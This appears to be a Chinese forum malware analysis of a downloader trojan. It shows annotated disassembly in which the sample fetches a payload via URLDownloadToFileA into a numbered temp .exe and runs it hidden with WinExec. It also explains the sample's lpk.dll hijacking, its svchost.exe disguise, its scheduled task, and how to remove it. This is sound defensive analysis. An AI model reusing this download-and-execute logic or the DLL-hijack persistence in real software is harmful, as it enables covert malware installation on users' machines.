003E850D .64:8920 mov dword ptr fs:, esp       ; = mov fs:[eax], esp
003E8510 .6A 00 push 0                         ; lpfnCB
003E8512 .6A 00 push 0                         ; dwReserved
003E8514 .8D95 18FEFFFF lea edx, dword ptr     ; = lea edx, [ebp-1E8]
003E851A .B8 01000000 mov eax, 1
003E851F .E8 84FEFFFF call 003E83A8 ; temp-folder path -> [ebp-1E8]
003E8524 .FFB5 18FEFFFF push dword ptr         ; = push [ebp-1E8] (part 1: temp dir)
003E852A .8D95 14FEFFFF lea edx, dword ptr     ; = lea edx, [ebp-1EC]
003E8530 .8B45 FC mov eax, dword ptr           ; = mov eax, [ebp-4] (i)
003E8533 .E8 68D4FFFF call 003E59A0            ; integer i -> string (input is the counter, result is concatenated into the name)
003E8538 .FFB5 14FEFFFF push dword ptr         ; = push [ebp-1EC] (part 2: "<i>")
003E853E .68 7C863E00 push 003E867C ; ".exe" (part 3)
003E8543 .8D85 1CFEFFFF lea eax, dword ptr     ; = lea eax, [ebp-1E4]
003E8549 .BA 03000000 mov edx, 3               ; concatenate the 3 pushed parts -> %TEMP%\<i>.exe (predictable name: file-system IOC)
003E854E .E8 81B9FFFF call 003E3ED4
003E8553 .8B85 1CFEFFFF mov eax, dword ptr     ; = mov eax, [ebp-1E4]
003E8559 .E8 02BAFFFF call 003E3F60            ; -> C string
003E855E .50 push eax                          ; szFileName
003E855F .8B45 F8 mov eax, dword ptr           ; = mov eax, [ebp-8] (URL)
003E8562 .E8 F9B9FFFF call 003E3F60
003E8567 .50 push eax                          ; szURL
003E8568 .6A 00 push 0                         ; pCaller
003E856A .E8 EDFDFFFF call <jmp.&URLMON.URLDownloadToFileA> ; download the payload; no integrity/signature check of what was fetched, and the HRESULT is overwritten by SleepEx below without being tested
003E856F .6A FF push -1 ; /Alertable = TRUE
003E8571 .6A 64 push 64 ; |Timeout = 100. ms
003E8573 .E8 8CC6FFFF call <jmp.&kernel32.SleepEx> ; \SleepEx
003E8578 .6A 00 push 0                         ; uCmdShow = 0 (SW_HIDE) for the WinExec below
003E857A .8D95 0CFEFFFF lea edx, dword ptr     ; = lea edx, [ebp-1F4]
003E8580 .B8 01000000 mov eax, 1
003E8585 .E8 1EFEFFFF call 003E83A8            ; temp-folder path -> [ebp-1F4]
003E858A .FFB5 0CFEFFFF push dword ptr         ; = push [ebp-1F4]
003E8590 .8D95 08FEFFFF lea edx, dword ptr     ; = lea edx, [ebp-1F8]
003E8596 .8B45 FC mov eax, dword ptr           ; = mov eax, [ebp-4]
003E8599 .E8 02D4FFFF call 003E59A0            ; i -> string
003E859E .FFB5 08FEFFFF push dword ptr         ; = push [ebp-1F8]
003E85A4 .68 7C863E00 push 003E867C ; ".exe"
003E85A9 .8D85 10FEFFFF lea eax, dword ptr     ; = lea eax, [ebp-1F0]
003E85AF .BA 03000000 mov edx, 3               ; rebuild the same %TEMP%\<i>.exe path
003E85B4 .E8 1BB9FFFF call 003E3ED4
003E85B9 .8B85 10FEFFFF mov eax, dword ptr     ; = mov eax, [ebp-1F0]
003E85BF .E8 9CB9FFFF call 003E3F60 ; -> C string for WinExec
003E85C4 .50 push eax ; |CmdLine
003E85C5 .E8 4AC6FFFF call <jmp.&kernel32.WinExec> ; \WinExec   ; run the downloaded payload hidden (per author); the loop continues at the condition block outside this excerpt
这个下载者主要就是运行改名伪装的 cmd.exe（%WINDIR%\svchost.exe），然后利用 lpk.dll 这个会被进程自动加载的特殊 DLL 进行劫持：放在 cmd.exe 副本同目录下的恶意 lpk.dll 被优先加载，再由它在新线程中 LoadLibrary 具有下载功能的 wsock32x.dll
详细的DLL劫持解说,大家可以去看海风大牛的《神奇的马甲Dll 》,贴子地址:http://www.unpack.cn/viewthread.php?tid=26167
清除的方法：先删除计划任务（%WINDIR%\Tasks\At1.job），结束仍在运行的伪装 svchost.exe（否则 lpk.dll/wsock32x.dll 可能因被占用而无法删除），用 attrib -r -h -s 去掉 Windows 目录下 wsock32x.dll、lpk.dll、avp.exe 以及 svchost.exe（实为 cmd.exe 副本）的只读/隐藏/系统属性后删除，并清理 c:\Deleteme.bat 和临时目录下的 gk_drf.txt、<序号>.exe 下载物即可...
只是一个简单的下载者分析,不要扔砖头啊....